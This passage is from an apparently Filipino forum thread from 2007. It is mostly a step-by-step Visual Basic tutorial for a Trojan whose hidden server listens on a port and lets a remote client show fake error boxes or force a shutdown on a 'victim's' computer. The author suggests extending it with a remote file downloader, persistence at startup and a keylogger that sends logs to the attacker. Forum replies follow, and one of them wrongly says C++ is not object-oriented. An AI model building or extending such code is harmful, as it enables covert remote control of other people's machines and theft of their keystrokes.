Then we add this code to our main form:



Code:
Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub



We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!



[/code]
Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
[/code]



Ok now we have a program that when the data “Msgbox� is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form



Code:

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub


Remember to add your winsock control and name it to win if you use this code.



Module



Code:
Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function


That’s all there is to the server side or Trojan part of it. Now on to the Client.


Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown� and "msgbox" lets make a client that sends the command “shutdown� and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.



Code:
Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub


That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown� or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handeling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination.
:slap::dance::beat::p

iBee
21st Oct '07 Sun, 19:05
^thanks pero sana walang gumamit nito para sa masama.. :unsure:

VBasic yan no? :D

kilik100
6th Nov '07 Tue, 16:34
oo nga bad ung pggwa ng virus..pero kung mkgwa k ng virus,my advantage din un,bka mkuha k ni bill gates,hehehe,bigtime!...cge pg ntutunan mo,paturo ah,mrunong ako ng c++,pro d nmn virus gngwa nmn,hehehe..

xyler
8th Nov '07 Thu, 11:33
ano po ung c++?

Mcmms
8th Nov '07 Thu, 22:25
xyler napag aaralan yan sa computer subject :D

iBee
8th Nov '07 Thu, 22:31
C++ is a kind of OOP (Object Oriented Programming) Language which is commonly used in creating computer software.

paki-sabi kung mali ang definition :ashamed:

sutil
13th Nov '07 Tue, 23:46
masasabi ko lang eh tama yung mga sinabi nila

kilik100
16th Nov '07 Fri, 19:44
tama!programming language un..

mrnine
17th Nov '07 Sat, 18:02
C++ is a kind of OOP (Object Oriented Programming) Language which is commonly used in creating computer software.

paki-sabi kung mali ang definition :ashamed:

clarify lang, hindi po OOP yung C++, (procedural programing po xa). example ng OOP is java.

drx2k
17th Nov '07 Sat, 18:54
how to make virus?

kung gusto mong matutong gumawa ng virus, you should learn how to program with programming language like assembly language, visual basic or visual basic script,

hyperkeios
17th Nov '07 Sat, 19:31
ang alam ko OOP ang C++... sinabi sa school namin yun eh.

wasak
18th Nov '07 Sun, 15:50
im only 11, and i can make virus bwahaha, hiv virus